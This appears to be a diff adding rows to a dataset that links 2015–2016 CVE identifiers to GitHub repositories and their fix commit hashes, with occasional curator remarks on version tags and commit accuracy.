+CVE-2015-0293;https://github.com/openssl/openssl;None:None;False;86f8fb0e344d62454f8daf3e15236b2b59210756,5cc6509dae697f0e74aaba73e1635f269a9c5e61; vulnerable tag is fixed +CVE-2015-0838;https://github.com/dulwich/dulwich;None:None;False;b25e8390074060ea2aed25cf070b8e98b85a3875; +CVE-2015-0846;https://github.com/jamesturk/django-markupfield;None:None;False;b45734ea1d206abc1ed2a90bdc779708066d49f3; +CVE-2015-1169;https://github.com/apereo/cas;None:None;False;8d22bfcb328a1948f40d29e11bdddc572e8d1363,1a8c5e98b81c649ce06a6a6ac8c5a6a9abddce73; +CVE-2015-1208;https://github.com/FFmpeg/FFmpeg;None:None;False;3ebd76a9c57558e284e94da367dd23b435e6a6d0,54b76eb5951502d24618c335d0bb275f70d31f3c; +CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; +CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; 1.1.1 did not contain it +CVE-2015-1782;https://github.com/libssh2/libssh2;None:None;False;7d94b69b802c03e8d7726f4ae61baba52cb7d871; +CVE-2015-1788;https://github.com/openssl/openssl;None:None;False;4924b37ee01f71ae19c94a8934b80eeb2f677932,40b8eb792d591d19751afc4d056c8e84260bdeb8,f61bbf8da532038ed0eae16a9a11771f3da22d30; +CVE-2015-1789;https://github.com/openssl/openssl;None:None;False;9bc3665ac9e3c36f7762acd3691e1115d250b030,57de3216e27c2e52bc3bc5bc7c94babdb7022179,f48b83b4fb7d6689584cf25f61ca63a4891f5b11,fa57f74a3941db6b2efb2f43c6add914ec83db20,370ac320301e28bb615cee80124c042649c95d14; +CVE-2015-1791;https://github.com/openssl/openssl;None:None;False;708cf593587e2fda67dae9782991ff9fccc781eb,dcad51bc13c9b716d9a66248bcc4038c071ff158,27c76b9b8010b536687318739c6f631ce4194688,370ac320301e28bb615cee80124c042649c95d14,939b4960276b040fc0ed52232238fcc9e2e9ec21,98ece4eebfb6cd45cc8d550c6ac0022965071afc,39bcfb129e816de00bf2170c3497e8104767beb7,8b4fd12b0d1734d281994000752c771e8cd0a103,467daf6b6ef0753ccfc5c024c2f63c948354d698,db96b5ab761fb97633dde9aec62c0032743e88f8,9545eac45bc79496763d2ded02629f88a8629fb9,0ae3473e8578b547100389bd029873af0cd9a22e,907f04a30354615e54beaa2bc0b986083f7793ee,106a9a5d7e26e728a654d7424849081bd988d4a5,d44f89c990b4c9c41f77e9a0ffd5dc7c4ca07f84; +CVE-2015-1792;https://github.com/openssl/openssl;None:None;False;dd90a91d8771fd1ad5083fd46a2b3da16a587757,857b2ced04be897488df311a257f254ad8516429,aa5ab40860deb3dc6d4d4c98a4efea99f7040a46,92f9a8bf3844359bb50d86dab92bc24b074d350d; advisory links wrong commit +CVE-2015-1793;https://github.com/openssl/openssl;None:None;False;9a0db453ba017ebcaccbee933ee6511a9ae4d1c8,2aacec8f4a5ba1b365620a7b17fcce311ada93ad,21376d8ae310cf0455ca2b73c8e9f77cafeb28dd,cb22d2ae5a5b6069dbf66dbcce07223ac15a16de,b3b1eb5735c5b3d566a9fc3bf745bf716a29afa0,aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d,692f07c3e0c04180b56febc2feb57cd94395a7a2; +CVE-2015-1830;https://github.com/apache/activemq;None:None;False;729c4731574ffffaf58ebefdbaeb3bd19ed1c7b7,9fd5cb7dfe0fcc431f99d5e14206e0090e72f36b; +CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; +CVE-2015-2068;https://github.com/dweeves/magmi-git;None:None;False;da400ea5772dd7427c2c1732a6a3a29363bbabdf,408320a2118f7474a482e968cd72c881bc712564; +CVE-2015-2156;https://github.com/netty/netty;None:None;False;97d871a7553a01384b43df855dccdda5205ae77a,d98b21be045a315ced88ada84000e4757cfb9892; +CVE-2015-2296;https://github.com/psf/requests;None:None;False;e776bb26560fe5e9fe7ae72719519e1d011b5d23,3bd8afbff29e50b38f889b2f688785a669b9aafc; +CVE-2015-2912;https://github.com/orientechnologies/orientdb;None:None;False;f11dbced94cb587f445cb99db08735c023921053,d5a45e608ba8764fd817c1bdd7cf966564e828e9,5dbd6035e4e59259f3e08ba8f1218785f36d1d2d; +CVE-2015-2913;https://github.com/orientechnologies/orientdb;None:None;False;7a5f61527343eae30ee0e5dfdcae60da412c69c3,668ece96be210e742a4e2820a3085b215cf55104; +CVE-2015-3010;https://github.com/ceph/ceph-deploy;None:None;False;eee56770393bf19ed2dd5389226c6190c08dee3f,3cdc6cb555173130d64ea6d90033a6e00cbde330; +CVE-2015-3192;https://github.com/spring-projects/spring-framework;None:None;False;d79ec68db40c381b8e205af52748ebd3163ee33b,9c3580d04e84d25a90ef4c249baee1b4e02df15e,5a711c05ec750f069235597173084c2ee7962424; +CVE-2015-3193;https://github.com/openssl/openssl;None:None;False;29851264f11ccc70c6c0140d7e3d8d93ef5c9b11,d73cc256c8e256c32ed959456101b73ba9842f72; +CVE-2015-3195;https://github.com/openssl/openssl;None:None;False;cf432b3b1bd7caa22943b41b94ec2472ae497dc6,cc598f321fbac9c04da5766243ed55d55948637d,b29ffa392e839d05171206523e84909146f7a77c,2cdafc51f008e65b2d5263a80ad0e89e9b56c8d3; +CVE-2015-3196;https://github.com/openssl/openssl;None:None;False;3c66a669dfc7b3792f7af0758ea26fe8502ce70c,d6be3124f22870f1888c532523b74ea5d89795eb,1392c238657ec745af6a40def03d67d4ce02a082; +CVE-2015-3197;https://github.com/openssl/openssl;None:None;False;d81a1600588b726c2bdccda7efad3cc7a87d6245,4040a7fd104b412bd446338c6c28a62eb7d8e852; +CVE-2015-3206;https://github.com/02strich/pykerberos;None:None;False;02d13860b25fab58e739f0e000bed0067b7c6f9c; +CVE-2015-3208;https://github.com/apache/activemq-artemis;None:None;False;48d9951d879e0c8cbb59d4b64ab59d53ef88310d; +CVE-2015-3220;https://github.com/trevp/tlslite;None:None;False;aca8d4f898b436ff6754e1a9ab96cae976c8a853; +CVE-2015-3253;https://github.com/apache/groovy;None:None;False;4a96e70f6315d3b28fc6f878e4d59dfba585a179,4df8b652aa018a5d5d1cda8fba938bf3422db31c,09e9778e8a33052d8c27105aee5310649637233d,716d3e67e744c7edeed7cbc3f874090d39355764; +CVE-2015-3395;https://github.com/FFmpeg/FFmpeg;None:None;False;f7e1367f58263593e6cee3c282f7277d7ee9d553,99a69249837079417ca8bec6dd0515ca996a748e,33877cd276f99fc234b5269d9d158ce71e50d363,539172c85b13796fe5ce2a7482f436b6e9b33cf6,48c7fe5b5834a197f10a6eb56cbe7cda8ee32407,a376ef4a17edb947bbcf54171daa914bd4585a4f,dfce316c12d867400fb132ff5094163e3d2634a3,70642090960c35dcd6da941c869bdf55d4f3bb00,5ecabd3c54b7c802522dc338838c9a4c2dc42948; +CVE-2015-3627;https://github.com/docker-archive/libcontainer;None:None;False;46132cebcf391b56842f5cf9b247d508c59bc625; +CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; +CVE-2015-4053;https://github.com/ceph/ceph-deploy;None:None;False;9f9fd6e3372043bd2fd67582324c8fb5d7aa361e,6fc7f7f58b338fa920a6a570485836fe91b6de21,ab240e32061ba5f89fca3d145fa229e8c8284edd,628bd9ed6bfb84821ba7d2240cc41a8783cc4617,5368d9d14d3bfbef480d1302511121768d557d5e,8ef6d41e5bdbaf2717671c1ace237d35fa8ebcb4,f898b4cf44abc1f7fe472b59e009e6ff44e441a7; +CVE-2015-4082;https://github.com/jborg/attic;None:None;False;78f9ad1faba7193ca7f0acccbc13b1ff6ebf9072; +CVE-2015-4410;https://github.com/mongoid/moped;None:None;False;dd5a7c14b5d2e466f7875d079af71ad19774609b; wrong repository??? +CVE-2015-4412;https://github.com/mongodb/bson-ruby;None:None;False;976da329ff03ecdfca3030eb6efe3c85e6db9999; there is also a false positive (vulnerability introducing commit) +CVE-2015-4619;https://github.com/denkGroot/Spina;None:None;False;bfe44f289e336f80b6593032679300c493735e75; +CVE-2015-4706;https://github.com/ipython/ipython;None:None;False;6884e8b36dc1e2d59e1d8ddb5e95788728d76e6f,7222bd53ad089a65fd610fab4626f9d0ab47dfce,c2078a53543ed502efd968649fee1125e0eb549c; +CVE-2015-5081;https://github.com/django-cms/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; +CVE-2015-5147;https://github.com/vmg/redcarpet;None:None;False;2cee777c1e5babe8a1e2683d31ea75cc4afe55fb; +CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882,5edbbeb7f950ed9db60b11f0fdce1ec96194f761; +CVE-2015-5207;https://github.com/apache/cordova-ios;None:None;False;a14e08eaa95211450f513c64d569d8c333dee4c5; commit outside the time interval +CVE-2015-5211;https://github.com/spring-projects/spring-framework;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402,03f547eb9868f48f44d59b56067d4ac4740672c3,2bd1daa75ee0b8ec33608ca6ab065ef3e1815543; +CVE-2015-5241;https://github.com/apache/juddi;None:None;False;018b5623cbf34b5810a1c6a7813d7d3c320bdbe0; +CVE-2015-5250;https://github.com/openshift/origin;None:None;False;dace5075e31b74703e944b6b3ebe8836be8d1b9a,5d021b0f3e0902b599fd8f528eb28a710aed223a,c55e4c7d12e15d83642b5872e620ecc5b35cb947; +CVE-2015-5253;https://github.com/apache/cxf;None:None;False;845eccb6484b43ba02875c71e824db23ae4f20c0,a61db289f87e448292f7ff0d0a3d25792dd4d42d,02245c656941f28b6b2be5e461e6db04a70d2436; +CVE-2015-5254;https://github.com/apache/activemq;None:None;False;e7a4b53f799685e337972dd36ba0253c04bcc01f,6f03921b31d9fefeddb0f4fa63150ed1f94a14b1,a7e2a44fe8d4435ae99532eb0ab852e6247f7b16,e100638244c4ca5eb2a1f16bcdc671c9859c2694; +CVE-2015-5305;https://github.com/kubernetes/kubernetes;None:None;False;8e07d2fc9312ed4f4fddd05d816b299754c1e967,63fb6c07a565fcb94df7778ad12f810ea1b3cdce,68f2add9bd5d43b9da1424d87d88f83d120e17d0,37f730f68c7f06e060f90714439bfb0dbb2df5e7; NVD does not contain versions at all +CVE-2015-5344;https://github.com/apache/camel;None:None;False;157c0b4a3c8017de432f1c99f83e374e97dc4d36,4cdc6b177ee7391eedc9f0b695c05d56f84b0812,b7afb3769a38b8e526f8046414d4a71430d77df0,369d0a6d605055cb843e7962b101e3bbcd113fec,8386d8f7260143802553bc6dbae2880d6c0bafda,4491c080cb6c8659fc05441e49307b7d4349aa56; +CVE-2015-5349;https://github.com/apache/directory-studio;None:None;False;ac57a26fcb98aa17fe9534575cf5fdad00a1c839; +CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816,a05fe052a18810e92d9be8c1185952c13fe4e5b0; +CVE-2015-6524;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; +CVE-2015-6584;https://github.com/DataTables/DataTablesSrc;None:None;False;ccf86dc5982bd8e16d11a0815c940f5b256874c9; +CVE-2015-6748;https://github.com/jhy/jsoup;None:None;False;4edb78991f8d0bf87dafde5e01ccd8922065c9b2,b86beca8feb26f9a3181e87fe36382f8ab4bdb98; +CVE-2015-6818;https://github.com/FFmpeg/FFmpeg;None:None;False;47f4e2d8960ca756ca153ab8e3e93d80449b8c91,e84d17c7c991f380622f6d2f25994dc6955d853c; +CVE-2015-6821;https://github.com/FFmpeg/FFmpeg;None:None;False;b160fc290cf49b516c5b6ee0730fd9da7fc623b1,88fa3243ddf320ce1d6691c6098e87263bd6d0ca; +CVE-2015-6822;https://github.com/FFmpeg/FFmpeg;None:None;False;39bbdebb1ed8eb9c9b0cd6db85afde6ba89d86e4,237751eb257fd528a91f35f0a835c2273957ee62; +CVE-2015-6823;https://github.com/FFmpeg/FFmpeg;None:None;False;f7068bf277a37479aecde2832208d820682b35e6,264eb0074f3b0591c9430b20927d6547c8757c48; +CVE-2015-6824;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d44d5c220e12ca0cb7a4eceb0f74759cb13111,1cbd7b08f661163ea0f41f03752e420a47904c11; +CVE-2015-6826;https://github.com/FFmpeg/FFmpeg;None:None;False;3197c0aa87a3b7190e17d49e6fbc7b554e4b3f0a; +CVE-2015-6918;https://github.com/saltstack/salt;None:None;False;28aa9b105804ff433d8f663b2f9b804f2b75495a,528916548726976dcc75626dc6f6641ceb206ee3; +CVE-2015-7294;https://github.com/vesse/node-ldapauth-fork;None:None;False;3feea43e243698bcaeffa904a7324f4d96df60e4; +CVE-2015-7314;https://github.com/gollum/gollum;None:None;False;ce68a88293ce3b18c261312392ad33a88bb69ea1,de5aed2f6a6f9ad62cae05dc59d16fbfdd7a4543; +CVE-2015-7315;https://github.com/zopefoundation/Products.CMFCore;None:None;False;a4ff51ce26c50001db0f7856009771340e6ecda3,e1dc70a6198073f2ceedbe725a93cde57c7bfb34,13b83717b2c3a9fb2f0c16c436ec8d986f42b0e5,e1d981bfa14b664317285f0f36498f4be4a23406; +CVE-2015-7316;https://github.com/plone/Products.CMFPlone;None:None;False;3da710a2cd68587f0bf34f2e7ea1167d6eeee087,1845b0a92312291811b68907bf2aa0fb448c4016; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; +CVE-2015-7528;https://github.com/kubernetes/kubernetes;None:None;False;afd56495a1052a3387b81df1786a8d0f51bc8671,4b1afe5b7483cba2907032b5910fcd41a48bbbec,da039b4a940a471d7025ce882b8392f8de10ea2b,9158aa1f09213c6e7118c55a95442d8a12d496b2; this was kubernetes +CVE-2015-7541;https://github.com/quadule/colorscore;None:None;False;570b5e854cecddd44d2047c44126aed951b61718; +CVE-2015-7559;https://github.com/apache/activemq;None:None;False;338a74dfa42a7b19d39adecacfa5f626a050e807,b8fc78ec6c367cbe2a40a674eaec64ac3d7d1ecb; vulnerable tag is fixed +CVE-2015-7577;https://github.com/rails/rails;None:None;False;0fde6f554b75b13b0435dd70f1c3ec02bc209e0d,5875bc3adeff7583cd2fca756f8c61fcb1bc2366,cdabc95608336dbea7b6a3a3e925de5bbd5313ba,2cb466353f2af080e73eaf66ba033ee27df9b9b5; +CVE-2015-7809;https://github.com/fabpot/Twig;None:None;False;30be07759a3de2558da5224f127d052ecf492e8f; +CVE-2015-8213;https://github.com/django/django;None:None;False;316bc3fc9437c5960c24baceb93c73f1939711e4,3ebbda0aef9e7a90ac6208bb8f9bc21228e2c7da,9f83fc2f66f5a0bac7c291aec55df66050bb6991,8a01c6b53169ee079cb21ac5919fdafcc8c5e172; +CVE-2015-8216;https://github.com/FFmpeg/FFmpeg;None:None;False;d24888ef19ba38b787b11d1ee091a3d94920c76a,fdb884263974b19584a4f37508d71bc60189f512; +CVE-2015-8217;https://github.com/FFmpeg/FFmpeg;None:None;False;93f30f825c08477fe8f76be00539e96014cc83c8,ff30907205fc4a9666a7ee93ca456e3a5bcacbc0; +CVE-2015-8218;https://github.com/FFmpeg/FFmpeg;None:None;False;d4a731b84a08f0f3839eaaaf82e97d8d9c67da46,a7bbb7fb884a02a7b380ef7afa787fca756b9d82; +CVE-2015-8309;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; +CVE-2015-8310;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; +CVE-2015-8618;https://github.com/golang/go;None:None;False;0027ed1872cdec08defe3b097c7123eaaf149e30,4306352182bf94f86f0cfc6a8b0ed461cbf1d82c; +CVE-2015-8747;https://github.com/Unrud/Radicale;None:None;False;bcaf452e516c02c9bed584a73736431c5e8831f1; +CVE-2015-8748;https://github.com/Kozea/Radicale;None:None;False;1109973a925970353dfd13c6df8de0e4e446d983,4bfe7c9f7991d534c8b9fbe153af9d341f925f98; +CVE-2015-8814;https://github.com/umbraco/Umbraco-CMS;None:None;False;18c3345e47663a358a042652e697b988d6a380eb; +CVE-2015-8854;https://github.com/markedjs/marked;None:None;False;a37bd643f05bf95ff18cafa2b06e7d741d2e2157; +CVE-2015-8861;https://github.com/handlebars-lang/handlebars.js;None:None;False;83b8e846a3569bd366cf0b6bdc1e4604d1a2077e; +CVE-2015-8862;https://github.com/janl/mustache.js;None:None;False;378bcca8a5cfe4058f294a3dbb78e8755e8e0da5; +CVE-2015-8968;https://github.com/square/git-fastclone;None:None;False;14198fe12443055839b1ba4cc294b04a38ae15f1,a8a33f187214185b885a10bcfe2527c74da84a8c,2b7a0be1ff8a4de2f43338e91649d6c4988bf994,93a4634abca94464387a8bde5a3062e858fc0f1e; +CVE-2015-9235;https://github.com/auth0/node-jsonwebtoken;None:None;False;1bb584bc382295eeb7ee8c4452a673a77a68b687; +CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; +CVE-2015-9243;https://github.com/hapijs/hapi;None:None;False;270e9a768b2fbb84ab832869d2de606c865f0e85,353bf2661d15f4529e6f70498681a385ec2daa77; +CVE-2015-9251;https://github.com/jquery/jquery;None:None;False;b078a62013782c7424a4a61a240c23c4c0b42614,f60729f3903d17917dc351f3ac87794de379b0cc; +CVE-2016-0750;https://github.com/infinispan/infinispan;None:None;False;f2989a9b7b5ef2d3be690250d9d1bc7b2fa045d7; +CVE-2016-0762;https://github.com/apache/tomcat;None:None;False;970e615c7ade6ec6c341470bbc76aa1256353737,86b2e436099cb48f30dad950175c5beeeb763756; +CVE-2016-1505;https://github.com/Unrud/Radicale;None:None;False;b4b3d51f33c7623d312f289252dd7bbb8f58bbe6; +CVE-2016-1905;https://github.com/deads2k/kubernetes;None:None;False;21a5d57c7551d99d195a38edc8b06bdc807aa4c1,e90c2bd7dcf506dee91f30ea35b3c72f83a38fba; +CVE-2016-2108;https://github.com/openssl/openssl;None:None;False;d7ab691bc479d3cf2eea07329db6ce0e2589f0b9,a0eed48d37a4b7beea0c966caf09ad46f4a92a44,f5da52e308a6aeea6d5f3df98c4da295d7e9cc27,32d3b0f52f77ce86d53f38685336668d47c5bdfe,3661bb4e7934668bd99ca777ea8b30eedfafa871; was 1.0.2b:1.0.2c +CVE-2016-2160;https://github.com/openshift/origin;None:None;False;2d0350c84150d88be4d1ac181694366832a55709,26e798bea2f765fcb48ae351321b7ae38a329201,a77c100b57f481d5a729bebbc8771222e147964d; does not specify versions (1.1.4 is fixed) +CVE-2016-2166;https://github.com/apache/qpid-proton;None:None;False;a0585851e1e8ed9678496e38278f4a7554d03636; fixed tag is vulnerable (happend when using git svn and the copying to github) +CVE-2016-2177;https://github.com/openssl/openssl;None:None;False;a004e72b95835136d3f1ea90517f706c24c03da7,6f35f6deb5ca7daebe289f86477e061ce3ee5f46; +CVE-2016-2512;https://github.com/django/django;None:None;False;c5544d289233f501917e25970c03ed444abbd4f0,ada7a4aefb9bec4c34667b511022be6057102f98,fc6d147a63f89795dbcdecb0559256470fff4380,382ab137312961ad62feb8109d70a5a581fe8350; +CVE-2016-2513;https://github.com/django/django;None:None;False;67b46ba7016da2d259c1ecc7d666d11f5e1cfaab,af7d09b0c5c6ab68e629fd9baf736f9dd203b18e,f4e6e02f7713a6924d16540be279909ff4091eb6; +CVE-2016-2537;https://github.com/mafintosh/is-my-json-valid;None:None;False;eca4beb21e61877d76fdf6bea771f72f39544d9b; +CVE-2016-2788;https://github.com/puppetlabs/marionette-collective;None:None;False;4de959d0eae2b4cfc5ed4a0f5f659d4bf49cbedb,39dc1af951e880bf787d48d860cf0da25e6725ea,4918a0f136aea04452b48a1ba29eb9aabcf5c97d; +CVE-2016-3081;https://github.com/apache/struts;None:None;False;f238cf4f1091be19fbcfd086b042c86a1bcaa7fc,5190b53673a710ead31bbb5f82cf4ca171994629; +CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;8999f8243197a5f8297d0cb1a0d86ed175678a77,2c3553f3681baf775c50bb0b49ea61cb44ea914f,8e67e4a4799a9765b3bd777eed3ee17f00514441; +CVE-2016-3094;https://github.com/apache/qpid-broker-j;None:None;False;24aaee1df7c3e408d89bebbc3426bcdd94dfb6c0,a4c8ecf0ac4884f63cfd57c07c12a144863c896c; +CVE-2016-3114;https://github.com/NexMirror/Kallithea;None:None;False;460fec61ad108252b7f56575211914e0f82ea6e8; +CVE-2016-3693;https://github.com/svenfuchs/safemode;None:None;False;0f764a1720a3a68fd2842e21377c8bfad6d7126f; +CVE-2016-3720;https://github.com/FasterXML/jackson-dataformat-xml;None:None;False;f0f19a4c924d9db9a1e2830434061c8640092cc0; +CVE-2016-3959;https://github.com/golang/go;None:None;False;eb876dd83cb8413335d64e50aae5d38337d1ebb4,2cfbb875208f4acecfb0b72de5aebe37e8d03a35,2d8ecac3d0dbceed8830a43a3e752770577ffed1; +CVE-2016-4000;https://github.com/jython/frozen-mirror;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; +CVE-2016-4009;https://github.com/python-pillow/Pillow;None:None;False;1723dc2d0709d4e3e65333dfcabcfddd25c0f83e,4e0d9b0b9740d258ade40cce248c93777362ac1e,95a25a0d82f414a52e174eb5389d485d4b3ddf34,41fae6d9e2da741d2c5464775c7f1a609ea03798; +CVE-2016-4055;https://github.com/moment/moment;None:None;False;34af63b8b21208a949dfaf42d228502c73d20ec0,52a807b961ead925be11ff5e632c8f7325a9ce36; +CVE-2016-4425;https://github.com/akheron/jansson;None:None;False;64ce0ad3731ebd77e02897b07920eadd0e2cc318,013c3892c3b7c39516507838ababb4e9167cc65c; +CVE-2016-4438;https://github.com/apache/struts;None:None;False;76eb8f38a33ad0f1f48464ee1311559c8d52dd6d; +CVE-2016-4442;https://github.com/MiniProfiler/rack-mini-profiler;None:None;False;4273771d65f1a7411e3ef5843329308d0e2d257c; +CVE-2016-4465;https://github.com/apache/struts;None:None;False;eccc31ebce5430f9e91b9684c63eaaf885e603f9,a0fdca138feec2c2e94eb75ca1f8b76678b4d152; +CVE-2016-4562;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4563;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4564;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; +CVE-2016-4855;https://github.com/ADOdb/ADOdb;None:None;False;fc80385305963905a3ad9f87e6fb83df4c235198,292e4a9433fe96f02cccc2313a7198efee844214; test file... +CVE-2016-4970;https://github.com/netty/netty;None:None;False;524156f164a910b8b0978d27a2c700a19cd8048f,9e2c400f89c5badc39919f811179d3d42ac5257c; +CVE-2016-4972;https://github.com/openstack/python-muranoclient;None:None;False;b1e8a1753ccc3faf06840f675403645311ac9d79,cd182ba363a11078ae7a0595f54751c1ebddd2e0,e470430814ceddadea66d2e4bb3a9b10b55869e6; +CVE-2016-4974;https://github.com/apache/qpid-jms-amqp-0-x;None:None;False;7e6843e2e1967bfdba477a683353dbf6287d6291; +CVE-2016-4977;https://github.com/spring-projects/spring-security-oauth;None:None;False;fff77d3fea477b566bcacfbfc95f85821a2bdc2d; +CVE-2016-5007;https://github.com/spring-projects/spring-security;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; +CVE-2016-5104;https://github.com/libimobiledevice/libimobiledevice;None:None;False;df1f5c4d70d0c19ad40072f5246ca457e7f9849e; +CVE-2016-5180;https://github.com/c-ares/c-ares;None:None;False;65c71be1cbe587f290432bef2f669ee6cb8ac137; +CVE-2016-5386;https://github.com/golang/go;None:None;False;b97df54c31d6c4cc2a28a3c83725366d52329223,cad4e97af8f2e0b9f09b97f67fb3a89ced2e9021,a357d15e9ee36a1232ae071d9968c4cf10a672b4; +CVE-2016-5388;https://github.com/apache/tomcat80;None:None;False;1977bf9df699c571cf3e08c2996533b959d4cb1e; +CVE-2016-5431;https://github.com/nov/jose-php;None:None;False;1cce55e27adf0274193eb1cd74b927a398a3df4b; +CVE-2016-5697;https://github.com/onelogin/ruby-saml;None:None;False;a571f52171e6bfd87db59822d1d9e8c38fb3b995; +CVE-2016-5841;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; +CVE-2016-5842;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; +CVE-2016-5851;https://github.com/python-openxml/python-docx;None:None;False;61b40b161b64173ab8e362aec1fd197948431beb; +CVE-2016-6186;https://github.com/django/django;None:None;False;93c538694e6b14a29cb0f52b784a3bfed604fda6,6fa150b2f8b601668083042324c4add534143cb1,d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d158,f68e5a99164867ab0e071a936470958ed867479d; +CVE-2016-6298;https://github.com/latchset/jwcrypto;None:None;False;eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba; +CVE-2016-6304;https://github.com/openssl/openssl;None:None;False;e408c09bbf7c3057bda4b8d20bec1b3a7771c15b,2c0d295e26306e15a92eb23a84a1802005c1c137,a59ab1c4dd27a4c7c6e88f3c33747532fd144412,ea39b16b71e4e72a228a4535bd6d6a02c5edbc1f; +CVE-2016-6519;https://github.com/openstack/manila-ui;None:None;False;fca19a1b0d42536644212c5d673fbd6866e67c43,eed69d6ac444c27981f7548c7e2fbc37e836c28d,009913d725bee34cef0bd62e47a298025ace2696,89593686ef18f2bd06223b92071b4be2362a5abd; +CVE-2016-6580;https://github.com/python-hyper/priority;None:None;False;7d01a7dc4db83bce50f20d47caf4f37b403a3ecd,1d6321a387d2becaf66dc22a84db31fbbf7f8d51; +CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366,940e7d246ed5ecafb6b93be79f90d920b5ece459,15654460f247dd4fae7fa42ab02bd037b352d1b8; +CVE-2016-6652;https://github.com/spring-projects/spring-data-jpa;None:None;False;b8e7fecccc7dc8edcabb4704656a7abe6352c08f,e9bd83f820b98c54d0b5a2ec0f3f1767332a862c,a22c17fc12f7063716cb40c11d1ff4e265ef8556,edd497b9c93b4f364ffc78ca302a05938d499271; vulnerable tag is fixed +CVE-2016-6793;https://github.com/apache/wicket;None:None;False;8faa056f35bb1fe0b21a92d0450a5aadad8f7753,134686ef7185d3f96fec953136ab4847cd36b68d; vulnerable tag is fixed +CVE-2016-6794;https://github.com/apache/tomcat;None:None;False;0b41766456b1980e4f809e13ad6dc9fa912bae7e,f8db078f1e6e8b225f8344e63595113ca34cd408,c1660182010b4255c21c874d69c124370a67784a; fixed tag is vulnerable (changed) +CVE-2016-6796;https://github.com/apache/tomcat;None:None;False;f603f2f4595073f9490e01699d2083112a7c09a7,f97769f50ee2613e1bf27107a01d48907fd993ac,ffa0346fba2946401630291b642f1cff66d6a2be,fb65c5fe6d298195beee11324416a975bea6d701,bec54243e09b4a171f0a0672e5d8d3cdb281f926,1d69a4ddb363ee96b41337495eb7a263f2e01ff7; fixed tag is vulnerable (changed) +CVE-2016-6797;https://github.com/apache/tomcat;None:None;False;b3406e6c318378cbf440f902f9fdbb8b440aef4e,d6b5600afe75e1086dd564344e1d085966e4237d,2859ac3eae132383cb6f3f2042e25d7a4a281b0d; fixed tag is vulnerable (changed) +CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;0c00609a172b3af3b86a01abbf5ed473214702ba,4d21cc25649e547520963b0f87300d656050e68c,67f2cc1ac78cd7bb721d556e8be27559efbf4e12,ea75d7c2aeaafecd9ab97736bf81c5616f703244,7fb4ba4a385069378c916b4fac3f145db802acd8,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,9e08618c73a852710cfd9904b8558ceb5c1b754c,eae001a54aae9c243ac06b5c8f711b2cb2038700; +CVE-2016-6814;https://github.com/apache/groovy;None:None;False;716d3e67e744c7edeed7cbc3f874090d39355764,4df8b652aa018a5d5d1cda8fba938bf3422db31c; +CVE-2016-6816;https://github.com/apache/tomcat;None:None;False;f96f5751d418ae5a2f550be040daf9c5f7d99256,516bda676ac8d0284da3e0295a7df70391315360,cdc0a935c2173aff60039a0b85e57a461381107c; fixed tag is vulnerable (changed) +CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21,8568a2ca230f4fb6aee483eb40fc7e3f28bc8b96; +CVE-2016-6823;https://github.com/ImageMagick/ImageMagick;None:None;False;4cc6ec8a4197d4c008577127736bf7985d632323,c1cf4802653970c050d175a6496fa1f11b7c089e; +CVE-2016-7036;https://github.com/mpdavis/python-jose;None:None;False;73007d6887a7517ac07c6e755e494baee49ef513,89b46353b9f611e9da38de3d2fedf52331167b93; +CVE-2016-7528;https://github.com/ImageMagick/ImageMagick;None:None;False;7be16a280014f895a951db4948df316a23dabc09; +CVE-2016-7569;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; +CVE-2016-8568;https://github.com/libgit2/libgit2;None:None;False;aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,a719ef5e6d4a1a8ec53469c7914032ed67922772; 